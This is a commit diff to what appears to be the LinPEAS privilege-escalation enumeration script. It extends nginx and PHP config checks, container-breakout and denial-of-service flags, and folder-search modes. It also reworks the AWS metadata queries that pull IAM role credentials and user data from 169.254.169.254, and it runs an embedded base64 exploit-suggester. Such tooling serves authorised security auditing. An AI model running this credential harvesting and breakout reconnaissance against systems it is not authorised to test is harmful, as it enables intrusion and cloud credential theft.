10k update
This commit is contained in:
parent
a5ca003383
commit
8b444ba674
@ -413,7 +413,7 @@ search:
|
|||||||
exec:
|
exec:
|
||||||
- 'echo "Apache version: $(warn_exec apache2 -v 2>/dev/null; warn_exec httpd -v 2>/dev/null)"'
|
- 'echo "Apache version: $(warn_exec apache2 -v 2>/dev/null; warn_exec httpd -v 2>/dev/null)"'
|
||||||
- 'echo "Nginx version: $(warn_exec nginx -v 2>/dev/null)"'
|
- 'echo "Nginx version: $(warn_exec nginx -v 2>/dev/null)"'
|
||||||
- if [ -d "/etc/apache2" ] && [ -r "/etc/apache2" ]; then 'grep -R -B1 "httpd-php" /etc/apache2 2>/dev/null'; fi
|
- if [ -d "/etc/apache2" ] && [ -r "/etc/apache2" ]; then grep -R -B1 "httpd-php" /etc/apache2 2>/dev/null; fi
|
||||||
- if [ -d "/usr/share/nginx/modules" ] && [ -r "/usr/share/nginx/modules" ]; then print_3title 'Nginx modules'; ls /usr/share/nginx/modules | sed -${E} "s,$NGINX_KNOWN_MODULES,${SED_GREEN},g"; fi
|
- if [ -d "/usr/share/nginx/modules" ] && [ -r "/usr/share/nginx/modules" ]; then print_3title 'Nginx modules'; ls /usr/share/nginx/modules | sed -${E} "s,$NGINX_KNOWN_MODULES,${SED_GREEN},g"; fi
|
||||||
- "print_3title 'PHP exec extensions'"
|
- "print_3title 'PHP exec extensions'"
|
||||||
|
|
||||||
@ -442,11 +442,33 @@ search:
|
|||||||
value:
|
value:
|
||||||
bad_regex: "On"
|
bad_regex: "On"
|
||||||
remove_regex: "^;"
|
remove_regex: "^;"
|
||||||
line_grep: '"allow_"'
|
line_grep: "allow_"
|
||||||
type: f
|
type: f
|
||||||
search_in:
|
search_in:
|
||||||
- common
|
- common
|
||||||
|
|
||||||
|
- name: "nginx.conf"
|
||||||
|
value:
|
||||||
|
bad_regex: "location.*.php$|$uri|$document_uri|proxy_intercept_errors.*on|proxy_hide_header.*|merge_slashes.*on|resolver.*|proxy_pass|internal|location.+[a-zA-Z0-9][^/]\\s+\\{|map|proxy_set_header.*Upgrade.*http_upgrade|proxy_set_header.*Connection.*http_connection"
|
||||||
|
remove_regex: "#"
|
||||||
|
type: f
|
||||||
|
remove_empty_lines: True
|
||||||
|
search_in:
|
||||||
|
- common
|
||||||
|
|
||||||
|
- name: "nginx"
|
||||||
|
value:
|
||||||
|
type: d
|
||||||
|
files:
|
||||||
|
- name: "*.conf"
|
||||||
|
value:
|
||||||
|
bad_regex: "location.*.php$|$uri|$document_uri|proxy_intercept_errors.*on|proxy_hide_header.*|merge_slashes.*on|resolver.*|proxy_pass|internal|location.+[a-zA-Z0-9][^/]\\s+\\{|map|proxy_set_header.*Upgrade.*http_upgrade|proxy_set_header.*Connection.*http_connection"
|
||||||
|
remove_empty_lines: True
|
||||||
|
remove_regex: '#'
|
||||||
|
remove_path: "nginx.conf"
|
||||||
|
search_in:
|
||||||
|
- common
|
||||||
|
|
||||||
- name: PHP Sessions
|
- name: PHP Sessions
|
||||||
value:
|
value:
|
||||||
config:
|
config:
|
||||||
|
@ -162,7 +162,7 @@ if [ "$(command -v perl 2>/dev/null)" ]; then
|
|||||||
print_2title "Executing Linux Exploit Suggester 2"
|
print_2title "Executing Linux Exploit Suggester 2"
|
||||||
print_info "https://github.com/jondonas/linux-exploit-suggester-2"
|
print_info "https://github.com/jondonas/linux-exploit-suggester-2"
|
||||||
les2_b64="peass{LES2}"
|
les2_b64="peass{LES2}"
|
||||||
echo $les2_b64 | base64 -d | perl | sed "s,$(printf '\033')\\[[0-9;]*[a-zA-Z],,g" | grep -i "CVE" -B 1 -A 10 | grep -Ev "^\-\-$" | sed -${E} "s,CVE-[0-9]+-[0-9]+,${SED_RED},g"
|
echo $les2_b64 | base64 -d | perl 2>/dev/null | sed "s,$(printf '\033')\\[[0-9;]*[a-zA-Z],,g" | grep -i "CVE" -B 1 -A 10 | grep -Ev "^\-\-$" | sed -${E} "s,CVE-[0-9]+-[0-9]+,${SED_RED},g"
|
||||||
echo ""
|
echo ""
|
||||||
fi
|
fi
|
||||||
|
|
||||||
|
@ -285,26 +285,26 @@ if [ "$inContainer" ]; then
|
|||||||
print_list "uevent_helper breakout ......... $uevent_helper_breakout\n" | sed -${E} "s,Yes,${SED_RED_YELLOW},"
|
print_list "uevent_helper breakout ......... $uevent_helper_breakout\n" | sed -${E} "s,Yes,${SED_RED_YELLOW},"
|
||||||
print_list "core_pattern breakout .......... $core_pattern_breakout\n" | sed -${E} "s,Yes,${SED_RED_YELLOW},"
|
print_list "core_pattern breakout .......... $core_pattern_breakout\n" | sed -${E} "s,Yes,${SED_RED_YELLOW},"
|
||||||
print_list "is modprobe present ............ $modprobe_present\n" | sed -${E} "s,/.*,${SED_RED},"
|
print_list "is modprobe present ............ $modprobe_present\n" | sed -${E} "s,/.*,${SED_RED},"
|
||||||
print_list "DoS via panic_on_oom ........... $panic_on_oom_dos\n"
|
print_list "DoS via panic_on_oom ........... $panic_on_oom_dos\n" | sed -${E} "s,/Yes,${SED_RED},"
|
||||||
print_list "DoS via panic_sys_fs ........... $panic_sys_fs_dos\n"
|
print_list "DoS via panic_sys_fs ........... $panic_sys_fs_dos\n" | sed -${E} "s,/Yes,${SED_RED},"
|
||||||
print_list "DoS via sysreq_trigger_dos ..... $sysreq_trigger_dos\n"
|
print_list "DoS via sysreq_trigger_dos ..... $sysreq_trigger_dos\n" | sed -${E} "s,/Yes,${SED_RED},"
|
||||||
print_list "/proc/config.gz readable ....... $proc_configgz_readable\n"
|
print_list "/proc/config.gz readable ....... $proc_configgz_readable\n" | sed -${E} "s,/Yes,${SED_RED},"
|
||||||
print_list "/proc/sched_debug readable ..... $sched_debug_readable\n"
|
print_list "/proc/sched_debug readable ..... $sched_debug_readable\n" | sed -${E} "s,/Yes,${SED_RED},"
|
||||||
print_list "/proc/*/mountinfo readable ..... $mountinfo_readable\n"
|
print_list "/proc/*/mountinfo readable ..... $mountinfo_readable\n" | sed -${E} "s,/Yes,${SED_RED},"
|
||||||
print_list "/sys/kernel/security present ... $security_present\n"
|
print_list "/sys/kernel/security present ... $security_present\n" | sed -${E} "s,/Yes,${SED_RED},"
|
||||||
print_list "/sys/kernel/security writable .. $security_writable\n"
|
print_list "/sys/kernel/security writable .. $security_writable\n" | sed -${E} "s,/Yes,${SED_RED},"
|
||||||
if [ "$EXTRA_CHECKS" ]; then
|
if [ "$EXTRA_CHECKS" ]; then
|
||||||
print_list "/proc/kmsg readable ............ $kmsg_readable\n"
|
print_list "/proc/kmsg readable ............ $kmsg_readable\n" | sed -${E} "s,/Yes,${SED_RED},"
|
||||||
print_list "/proc/kallsyms readable ........ $kallsyms_readable\n"
|
print_list "/proc/kallsyms readable ........ $kallsyms_readable\n" | sed -${E} "s,/Yes,${SED_RED},"
|
||||||
print_list "/proc/self/mem readable ........ $sched_debug_readable\n"
|
print_list "/proc/self/mem readable ........ $sched_debug_readable\n" | sed -${E} "s,/Yes,${SED_RED},"
|
||||||
print_list "/proc/kcore readable ........... $kcore_readable\n"
|
print_list "/proc/kcore readable ........... $kcore_readable\n" | sed -${E} "s,/Yes,${SED_RED},"
|
||||||
print_list "/proc/kmem readable ............ $kmem_readable\n"
|
print_list "/proc/kmem readable ............ $kmem_readable\n" | sed -${E} "s,/Yes,${SED_RED},"
|
||||||
print_list "/proc/kmem writable ............ $kmem_writable\n"
|
print_list "/proc/kmem writable ............ $kmem_writable\n" | sed -${E} "s,/Yes,${SED_RED},"
|
||||||
print_list "/proc/mem readable ............. $mem_readable\n"
|
print_list "/proc/mem readable ............. $mem_readable\n" | sed -${E} "s,/Yes,${SED_RED},"
|
||||||
print_list "/proc/mem writable ............. $mem_writable\n"
|
print_list "/proc/mem writable ............. $mem_writable\n" | sed -${E} "s,/Yes,${SED_RED},"
|
||||||
print_list "/sys/kernel/vmcoreinfo readable $vmcoreinfo_readable\n"
|
print_list "/sys/kernel/vmcoreinfo readable $vmcoreinfo_readable\n" | sed -${E} "s,/Yes,${SED_RED},"
|
||||||
print_list "/sys/firmware/efi/vars writable $efi_vars_writable\n"
|
print_list "/sys/firmware/efi/vars writable $efi_vars_writable\n" | sed -${E} "s,/Yes,${SED_RED},"
|
||||||
print_list "/sys/firmware/efi/efivars writable $efi_efivars_writable\n"
|
print_list "/sys/firmware/efi/efivars writable $efi_efivars_writable\n" | sed -${E} "s,/Yes,${SED_RED},"
|
||||||
fi
|
fi
|
||||||
|
|
||||||
echo ""
|
echo ""
|
||||||
|
@ -187,11 +187,11 @@ if [ "$is_aws_ecs" = "Yes" ]; then
|
|||||||
|
|
||||||
if [ "$aws_ecs_metadata_uri" ]; then
|
if [ "$aws_ecs_metadata_uri" ]; then
|
||||||
print_3title "Container Info"
|
print_3title "Container Info"
|
||||||
exec_with_jq $aws_ecs_req "$aws_ecs_metadata_uri"
|
exec_with_jq eval $aws_ecs_req "$aws_ecs_metadata_uri"
|
||||||
echo ""
|
echo ""
|
||||||
|
|
||||||
print_3title "Task Info"
|
print_3title "Task Info"
|
||||||
exec_with_jq $aws_ecs_req "$aws_ecs_metadata_uri/task"
|
exec_with_jq eval $aws_ecs_req "$aws_ecs_metadata_uri/task"
|
||||||
echo ""
|
echo ""
|
||||||
else
|
else
|
||||||
echo "I couldn't find ECS_CONTAINER_METADATA_URI env var to get container info"
|
echo "I couldn't find ECS_CONTAINER_METADATA_URI env var to get container info"
|
||||||
@ -199,7 +199,7 @@ if [ "$is_aws_ecs" = "Yes" ]; then
|
|||||||
|
|
||||||
if [ "$aws_ecs_service_account_uri" ]; then
|
if [ "$aws_ecs_service_account_uri" ]; then
|
||||||
print_3title "IAM Role"
|
print_3title "IAM Role"
|
||||||
exec_with_jq $aws_ecs_req "$aws_ecs_service_account_uri"
|
exec_with_jq eval $aws_ecs_req "$aws_ecs_service_account_uri"
|
||||||
echo ""
|
echo ""
|
||||||
else
|
else
|
||||||
echo "I couldn't find AWS_CONTAINER_CREDENTIALS_RELATIVE_URI env var to get IAM role info (the task is running without a task role probably)"
|
echo "I couldn't find AWS_CONTAINER_CREDENTIALS_RELATIVE_URI env var to get IAM role info (the task is running without a task role probably)"
|
||||||
@ -214,52 +214,52 @@ if [ "$is_aws_ec2" = "Yes" ]; then
|
|||||||
|
|
||||||
aws_req=""
|
aws_req=""
|
||||||
if [ "$(command -v curl)" ]; then
|
if [ "$(command -v curl)" ]; then
|
||||||
aws_req='curl -s -f -H "$HEADER"'
|
aws_req="curl -s -f -H '$HEADER'"
|
||||||
elif [ "$(command -v wget)" ]; then
|
elif [ "$(command -v wget)" ]; then
|
||||||
aws_req='wget -q -O - -H "$HEADER"'
|
aws_req="wget -q -O - -H '$HEADER'"
|
||||||
else
|
else
|
||||||
echo "Neither curl nor wget were found, I can't enumerate the metadata service :("
|
echo "Neither curl nor wget were found, I can't enumerate the metadata service :("
|
||||||
fi
|
fi
|
||||||
|
|
||||||
if [ "$aws_req" ]; then
|
if [ "$aws_req" ]; then
|
||||||
printf "ami-id: "; $aws_req "$URL/ami-id"; echo ""
|
printf "ami-id: "; eval $aws_req "$URL/ami-id"; echo ""
|
||||||
printf "instance-action: "; $aws_req "$URL/instance-action"; echo ""
|
printf "instance-action: "; eval $aws_req "$URL/instance-action"; echo ""
|
||||||
printf "instance-id: "; $aws_req "$URL/instance-id"; echo ""
|
printf "instance-id: "; eval $aws_req "$URL/instance-id"; echo ""
|
||||||
printf "instance-life-cycle: "; $aws_req "$URL/instance-life-cycle"; echo ""
|
printf "instance-life-cycle: "; eval $aws_req "$URL/instance-life-cycle"; echo ""
|
||||||
printf "instance-type: "; $aws_req "$URL/instance-type"; echo ""
|
printf "instance-type: "; eval $aws_req "$URL/instance-type"; echo ""
|
||||||
printf "region: "; $aws_req "$URL/placement/region"; echo ""
|
printf "region: "; eval $aws_req "$URL/placement/region"; echo ""
|
||||||
|
|
||||||
echo ""
|
echo ""
|
||||||
print_3title "Account Info"
|
print_3title "Account Info"
|
||||||
exec_with_jq $aws_req "$URL/identity-credentials/ec2/info"; echo ""
|
exec_with_jq eval $aws_req "$URL/identity-credentials/ec2/info"; echo ""
|
||||||
|
|
||||||
echo ""
|
echo ""
|
||||||
print_3title "Network Info"
|
print_3title "Network Info"
|
||||||
for mac in $($aws_req "$URL/network/interfaces/macs/" 2>/dev/null); do
|
for mac in $(eval $aws_req "$URL/network/interfaces/macs/" 2>/dev/null); do
|
||||||
echo "Mac: $mac"
|
echo "Mac: $mac"
|
||||||
printf "Owner ID: "; $aws_req "$URL/network/interfaces/macs/$mac/owner-id"; echo ""
|
printf "Owner ID: "; eval $aws_req "$URL/network/interfaces/macs/$mac/owner-id"; echo ""
|
||||||
printf "Public Hostname: "; $aws_req "$URL/network/interfaces/macs/$mac/public-hostname"; echo ""
|
printf "Public Hostname: "; eval $aws_req "$URL/network/interfaces/macs/$mac/public-hostname"; echo ""
|
||||||
printf "Security Groups: "; $aws_req "$URL/network/interfaces/macs/$mac/security-groups"; echo ""
|
printf "Security Groups: "; eval $aws_req "$URL/network/interfaces/macs/$mac/security-groups"; echo ""
|
||||||
echo "Private IPv4s:"; $aws_req "$URL/network/interfaces/macs/$mac/ipv4-associations/"; echo ""
|
echo "Private IPv4s:"; eval $aws_req "$URL/network/interfaces/macs/$mac/ipv4-associations/"; echo ""
|
||||||
printf "Subnet IPv4: "; $aws_req "$URL/network/interfaces/macs/$mac/subnet-ipv4-cidr-block"; echo ""
|
printf "Subnet IPv4: "; eval $aws_req "$URL/network/interfaces/macs/$mac/subnet-ipv4-cidr-block"; echo ""
|
||||||
echo "PrivateIPv6s:"; $aws_req "$URL/network/interfaces/macs/$mac/ipv6s"; echo ""
|
echo "PrivateIPv6s:"; eval $aws_req "$URL/network/interfaces/macs/$mac/ipv6s"; echo ""
|
||||||
printf "Subnet IPv6: "; $aws_req "$URL/network/interfaces/macs/$mac/subnet-ipv6-cidr-blocks"; echo ""
|
printf "Subnet IPv6: "; eval $aws_req "$URL/network/interfaces/macs/$mac/subnet-ipv6-cidr-blocks"; echo ""
|
||||||
echo "Public IPv4s:"; $aws_req "$URL/network/interfaces/macs/$mac/public-ipv4s"; echo ""
|
echo "Public IPv4s:"; eval $aws_req "$URL/network/interfaces/macs/$mac/public-ipv4s"; echo ""
|
||||||
echo ""
|
echo ""
|
||||||
done
|
done
|
||||||
|
|
||||||
echo ""
|
echo ""
|
||||||
print_3title "IAM Role"
|
print_3title "IAM Role"
|
||||||
exec_with_jq $aws_req "$URL/iam/info"; echo ""
|
exec_with_jq eval $aws_req "$URL/iam/info"; echo ""
|
||||||
for role in $($aws_req "$URL/iam/security-credentials/" 2>/dev/null); do
|
for role in $(eval $aws_req "$URL/iam/security-credentials/" 2>/dev/null); do
|
||||||
echo "Role: $role"
|
echo "Role: $role"
|
||||||
exec_with_jq $aws_req "$URL/iam/security-credentials/$role"; echo ""
|
exec_with_jq eval $aws_req "$URL/iam/security-credentials/$role"; echo ""
|
||||||
echo ""
|
echo ""
|
||||||
done
|
done
|
||||||
|
|
||||||
echo ""
|
echo ""
|
||||||
print_3title "User Data"
|
print_3title "User Data"
|
||||||
$aws_req "http://169.254.169.254/latest/user-data"
|
eval $aws_req "http://169.254.169.254/latest/user-data"
|
||||||
fi
|
fi
|
||||||
fi
|
fi
|
||||||
|
|
||||||
|
@ -3,6 +3,7 @@
|
|||||||
#-----) Processes & Cron & Services & Timers (-----#
|
#-----) Processes & Cron & Services & Timers (-----#
|
||||||
####################################################
|
####################################################
|
||||||
|
|
||||||
|
if ! [ "$SEARCH_IN_FOLDER" ]; then
|
||||||
#-- PCS) Cleaned proccesses
|
#-- PCS) Cleaned proccesses
|
||||||
print_2title "Cleaned processes"
|
print_2title "Cleaned processes"
|
||||||
if [ "$NOUSEPS" ]; then
|
if [ "$NOUSEPS" ]; then
|
||||||
@ -39,7 +40,9 @@ else
|
|||||||
ps auxwww 2>/dev/null | awk '{print $11}' | xargs ls -la 2>/dev/null |awk '!x[$0]++' 2>/dev/null | grep -v " root root " | grep -v " $USER " | sed -${E} "s,$Wfolders,${SED_RED_YELLOW},g" | sed -${E} "s,$binW,${SED_RED_YELLOW},g" | sed -${E} "s,$sh_usrs,${SED_RED}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_RED}," | sed "s,root,${SED_GREEN},"
|
ps auxwww 2>/dev/null | awk '{print $11}' | xargs ls -la 2>/dev/null |awk '!x[$0]++' 2>/dev/null | grep -v " root root " | grep -v " $USER " | sed -${E} "s,$Wfolders,${SED_RED_YELLOW},g" | sed -${E} "s,$binW,${SED_RED_YELLOW},g" | sed -${E} "s,$sh_usrs,${SED_RED}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_RED}," | sed "s,root,${SED_GREEN},"
|
||||||
fi
|
fi
|
||||||
echo ""
|
echo ""
|
||||||
|
fi
|
||||||
|
|
||||||
|
if ! [ "$SEARCH_IN_FOLDER" ]; then
|
||||||
#-- PCS) Files opened by processes belonging to other users
|
#-- PCS) Files opened by processes belonging to other users
|
||||||
if ! [ "$IAMROOT" ]; then
|
if ! [ "$IAMROOT" ]; then
|
||||||
print_2title "Files opened by processes belonging to other users"
|
print_2title "Files opened by processes belonging to other users"
|
||||||
@ -47,7 +50,9 @@ if ! [ "$IAMROOT" ]; then
|
|||||||
lsof 2>/dev/null | grep -v "$USER" | grep -iv "permission denied" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed "s,root,${SED_RED},"
|
lsof 2>/dev/null | grep -v "$USER" | grep -iv "permission denied" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed "s,root,${SED_RED},"
|
||||||
echo ""
|
echo ""
|
||||||
fi
|
fi
|
||||||
|
fi
|
||||||
|
|
||||||
|
if ! [ "$SEARCH_IN_FOLDER" ]; then
|
||||||
#-- PCS) Processes with credentials inside memory
|
#-- PCS) Processes with credentials inside memory
|
||||||
print_2title "Processes with credentials in memory (root req)"
|
print_2title "Processes with credentials in memory (root req)"
|
||||||
print_info "https://book.hacktricks.xyz/linux-hardening/privilege-escalation#credentials-from-process-memory"
|
print_info "https://book.hacktricks.xyz/linux-hardening/privilege-escalation#credentials-from-process-memory"
|
||||||
@ -58,7 +63,9 @@ if echo "$pslist" | grep -q "vsftpd"; then echo "vsftpd process found (dump cred
|
|||||||
if echo "$pslist" | grep -q "apache2"; then echo "apache2 process found (dump creds from memory as root)" | sed "s,apache2,${SED_RED},"; else echo_not_found "apache2"; fi
|
if echo "$pslist" | grep -q "apache2"; then echo "apache2 process found (dump creds from memory as root)" | sed "s,apache2,${SED_RED},"; else echo_not_found "apache2"; fi
|
||||||
if echo "$pslist" | grep -q "sshd:"; then echo "sshd: process found (dump creds from memory as root)" | sed "s,sshd:,${SED_RED},"; else echo_not_found "sshd"; fi
|
if echo "$pslist" | grep -q "sshd:"; then echo "sshd: process found (dump creds from memory as root)" | sed "s,sshd:,${SED_RED},"; else echo_not_found "sshd"; fi
|
||||||
echo ""
|
echo ""
|
||||||
|
fi
|
||||||
|
|
||||||
|
if ! [ "$SEARCH_IN_FOLDER" ]; then
|
||||||
#-- PCS) Different processes 1 min
|
#-- PCS) Different processes 1 min
|
||||||
if ! [ "$FAST" ] && ! [ "$SUPERFAST" ]; then
|
if ! [ "$FAST" ] && ! [ "$SUPERFAST" ]; then
|
||||||
print_2title "Different processes executed during 1 min (interesting is low number of repetitions)"
|
print_2title "Different processes executed during 1 min (interesting is low number of repetitions)"
|
||||||
@ -67,7 +74,9 @@ if ! [ "$FAST" ] && ! [ "$SUPERFAST" ]; then
|
|||||||
if [ "$(ps -e -o command 2>/dev/null)" ]; then for i in $(seq 1 1250); do ps -e -o command >> "$temp_file" 2>/dev/null; sleep 0.05; done; sort "$temp_file" 2>/dev/null | uniq -c | grep -v "\[" | sed '/^.\{200\}./d' | sort -r -n | grep -E -v "\s*[1-9][0-9][0-9][0-9]"; rm "$temp_file"; fi
|
if [ "$(ps -e -o command 2>/dev/null)" ]; then for i in $(seq 1 1250); do ps -e -o command >> "$temp_file" 2>/dev/null; sleep 0.05; done; sort "$temp_file" 2>/dev/null | uniq -c | grep -v "\[" | sed '/^.\{200\}./d' | sort -r -n | grep -E -v "\s*[1-9][0-9][0-9][0-9]"; rm "$temp_file"; fi
|
||||||
echo ""
|
echo ""
|
||||||
fi
|
fi
|
||||||
|
fi
|
||||||
|
|
||||||
|
if ! [ "$SEARCH_IN_FOLDER" ]; then
|
||||||
#-- PCS) Cron
|
#-- PCS) Cron
|
||||||
print_2title "Cron jobs"
|
print_2title "Cron jobs"
|
||||||
print_info "https://book.hacktricks.xyz/linux-hardening/privilege-escalation#scheduled-cron-jobs"
|
print_info "https://book.hacktricks.xyz/linux-hardening/privilege-escalation#scheduled-cron-jobs"
|
||||||
@ -80,8 +89,15 @@ cat /etc/cron* /etc/at* /etc/anacrontab /var/spool/cron/crontabs/* /etc/incron.d
|
|||||||
crontab -l -u "$USER" 2>/dev/null | tr -d "\r"
|
crontab -l -u "$USER" 2>/dev/null | tr -d "\r"
|
||||||
ls -lR /usr/lib/cron/tabs/ /private/var/at/jobs /var/at/tabs/ /etc/periodic/ 2>/dev/null | sed -${E} "s,$cronjobsG,${SED_GREEN},g" | sed "s,$cronjobsB,${SED_RED},g" #MacOS paths
|
ls -lR /usr/lib/cron/tabs/ /private/var/at/jobs /var/at/tabs/ /etc/periodic/ 2>/dev/null | sed -${E} "s,$cronjobsG,${SED_GREEN},g" | sed "s,$cronjobsB,${SED_RED},g" #MacOS paths
|
||||||
atq 2>/dev/null
|
atq 2>/dev/null
|
||||||
|
else
|
||||||
|
print_2title "Cron jobs"
|
||||||
|
print_info "https://book.hacktricks.xyz/linux-hardening/privilege-escalation#scheduled-cron-jobs"
|
||||||
|
find "$SEARCH_IN_FOLDER" '(' -type d -or -type f ')' '(' -name "cron*" -or -name "anacron" -or -name "anacrontab" -or -name "incron.d" -or -name "incron" -or -name "at" -or -name "periodic" ')' -exec echo {} \; -exec ls -lR {} \;
|
||||||
|
fi
|
||||||
echo ""
|
echo ""
|
||||||
|
|
||||||
|
|
||||||
|
if ! [ "$SEARCH_IN_FOLDER" ]; then
|
||||||
if [ "$MACPEAS" ]; then
|
if [ "$MACPEAS" ]; then
|
||||||
print_2title "Third party LaunchAgents & LaunchDemons"
|
print_2title "Third party LaunchAgents & LaunchDemons"
|
||||||
print_info "https://book.hacktricks.xyz/macos/macos-security-and-privilege-escalation#launchd"
|
print_info "https://book.hacktricks.xyz/macos/macos-security-and-privilege-escalation#launchd"
|
||||||
@ -120,7 +136,9 @@ if [ "$MACPEAS" ]; then
|
|||||||
ls -l /private/var/db/emondClients
|
ls -l /private/var/db/emondClients
|
||||||
echo ""
|
echo ""
|
||||||
fi
|
fi
|
||||||
|
fi
|
||||||
|
|
||||||
|
if ! [ "$SEARCH_IN_FOLDER" ]; then
|
||||||
#-- PCS) Services
|
#-- PCS) Services
|
||||||
if [ "$EXTRA_CHECKS" ]; then
|
if [ "$EXTRA_CHECKS" ]; then
|
||||||
print_2title "Services"
|
print_2title "Services"
|
||||||
@ -128,21 +146,24 @@ if [ "$EXTRA_CHECKS" ]; then
|
|||||||
(service --status-all || service -e || chkconfig --list || rc-status || launchctl list) 2>/dev/null || echo_not_found "service|chkconfig|rc-status|launchctl"
|
(service --status-all || service -e || chkconfig --list || rc-status || launchctl list) 2>/dev/null || echo_not_found "service|chkconfig|rc-status|launchctl"
|
||||||
echo ""
|
echo ""
|
||||||
fi
|
fi
|
||||||
|
fi
|
||||||
|
|
||||||
|
if ! [ "$SEARCH_IN_FOLDER" ]; then
|
||||||
#-- PSC) systemd PATH
|
#-- PSC) systemd PATH
|
||||||
print_2title "Systemd PATH"
|
print_2title "Systemd PATH"
|
||||||
print_info "https://book.hacktricks.xyz/linux-hardening/privilege-escalation#systemd-path-relative-paths"
|
print_info "https://book.hacktricks.xyz/linux-hardening/privilege-escalation#systemd-path-relative-paths"
|
||||||
systemctl show-environment 2>/dev/null | grep "PATH" | sed -${E} "s,$Wfolders\|\./\|\.:\|:\.,${SED_RED_YELLOW},g"
|
systemctl show-environment 2>/dev/null | grep "PATH" | sed -${E} "s,$Wfolders\|\./\|\.:\|:\.,${SED_RED_YELLOW},g"
|
||||||
WRITABLESYSTEMDPATH=$(systemctl show-environment 2>/dev/null | grep "PATH" | grep -E "$Wfolders")
|
WRITABLESYSTEMDPATH=$(systemctl show-environment 2>/dev/null | grep "PATH" | grep -E "$Wfolders")
|
||||||
echo ""
|
echo ""
|
||||||
|
fi
|
||||||
|
|
||||||
#-- PSC) .service files
|
#-- PSC) .service files
|
||||||
#TODO: .service files in MACOS are folders
|
#TODO: .service files in MACOS are folders
|
||||||
print_2title "Analyzing .service files"
|
print_2title "Analyzing .service files"
|
||||||
print_info "https://book.hacktricks.xyz/linux-hardening/privilege-escalation#services"
|
print_info "https://book.hacktricks.xyz/linux-hardening/privilege-escalation#services"
|
||||||
printf "%s\n" "$PSTORAGE_SYSTEMD" | while read s; do
|
printf "%s\n" "$PSTORAGE_SYSTEMD" | while read s; do
|
||||||
if [ ! -O "$s" ]; then #Remove services that belongs to the current user
|
if [ ! -O "$s" ] || [ "$SEARCH_IN_FOLDER" ]; then #Remove services that belongs to the current user or if firmware see everything
|
||||||
if ! [ "$IAMROOT" ] && [ -w "$s" ] && [ -f "$s" ]; then
|
if ! [ "$IAMROOT" ] && [ -w "$s" ] && [ -f "$s" ] && ! [ "$SEARCH_IN_FOLDER" ]; then
|
||||||
echo "$s" | sed -${E} "s,.*,${SED_RED_YELLOW},g"
|
echo "$s" | sed -${E} "s,.*,${SED_RED_YELLOW},g"
|
||||||
fi
|
fi
|
||||||
servicebinpaths=$(grep -Eo '^Exec.*?=[!@+-]*[a-zA-Z0-9_/\-]+' "$s" 2>/dev/null | cut -d '=' -f2 | sed 's,^[@\+!-]*,,') #Get invoked paths
|
servicebinpaths=$(grep -Eo '^Exec.*?=[!@+-]*[a-zA-Z0-9_/\-]+' "$s" 2>/dev/null | cut -d '=' -f2 | sed 's,^[@\+!-]*,,') #Get invoked paths
|
||||||
@ -165,17 +186,19 @@ done
|
|||||||
if [ ! "$WRITABLESYSTEMDPATH" ]; then echo "You can't write on systemd PATH" | sed -${E} "s,.*,${SED_GREEN},"; fi
|
if [ ! "$WRITABLESYSTEMDPATH" ]; then echo "You can't write on systemd PATH" | sed -${E} "s,.*,${SED_GREEN},"; fi
|
||||||
echo ""
|
echo ""
|
||||||
|
|
||||||
|
if ! [ "$SEARCH_IN_FOLDER" ]; then
|
||||||
#-- PSC) Timers
|
#-- PSC) Timers
|
||||||
print_2title "System timers"
|
print_2title "System timers"
|
||||||
print_info "https://book.hacktricks.xyz/linux-hardening/privilege-escalation#timers"
|
print_info "https://book.hacktricks.xyz/linux-hardening/privilege-escalation#timers"
|
||||||
(systemctl list-timers --all 2>/dev/null | grep -Ev "(^$|timers listed)" | sed -${E} "s,$timersG,${SED_GREEN},") || echo_not_found
|
(systemctl list-timers --all 2>/dev/null | grep -Ev "(^$|timers listed)" | sed -${E} "s,$timersG,${SED_GREEN},") || echo_not_found
|
||||||
echo ""
|
echo ""
|
||||||
|
fi
|
||||||
|
|
||||||
#-- PSC) .timer files
|
#-- PSC) .timer files
|
||||||
print_2title "Analyzing .timer files"
|
print_2title "Analyzing .timer files"
|
||||||
print_info "https://book.hacktricks.xyz/linux-hardening/privilege-escalation#timers"
|
print_info "https://book.hacktricks.xyz/linux-hardening/privilege-escalation#timers"
|
||||||
printf "%s\n" "$PSTORAGE_TIMER" | while read t; do
|
printf "%s\n" "$PSTORAGE_TIMER" | while read t; do
|
||||||
if ! [ "$IAMROOT" ] && [ -w "$t" ]; then
|
if ! [ "$IAMROOT" ] && [ -w "$t" ] && ! [ "$SEARCH_IN_FOLDER" ]; then
|
||||||
echo "$t" | sed -${E} "s,.*,${SED_RED},g"
|
echo "$t" | sed -${E} "s,.*,${SED_RED},g"
|
||||||
fi
|
fi
|
||||||
timerbinpaths=$(grep -Po '^Unit=*(.*?$)' $t 2>/dev/null | cut -d '=' -f2)
|
timerbinpaths=$(grep -Po '^Unit=*(.*?$)' $t 2>/dev/null | cut -d '=' -f2)
|
||||||
@ -197,7 +220,7 @@ if ! [ "$IAMROOT" ]; then
|
|||||||
print_2title "Analyzing .socket files"
|
print_2title "Analyzing .socket files"
|
||||||
print_info "https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sockets"
|
print_info "https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sockets"
|
||||||
printf "%s\n" "$PSTORAGE_SOCKET" | while read s; do
|
printf "%s\n" "$PSTORAGE_SOCKET" | while read s; do
|
||||||
if ! [ "$IAMROOT" ] && [ -w "$s" ] && [ -f "$s" ]; then
|
if ! [ "$IAMROOT" ] && [ -w "$s" ] && [ -f "$s" ] && ! [ "$SEARCH_IN_FOLDER" ]; then
|
||||||
echo "Writable .socket file: $s" | sed "s,/.*,${SED_RED},g"
|
echo "Writable .socket file: $s" | sed "s,/.*,${SED_RED},g"
|
||||||
fi
|
fi
|
||||||
socketsbinpaths=$(grep -Eo '^(Exec).*?=[!@+-]*/[a-zA-Z0-9_/\-]+' "$s" 2>/dev/null | cut -d '=' -f2 | sed 's,^[@\+!-]*,,')
|
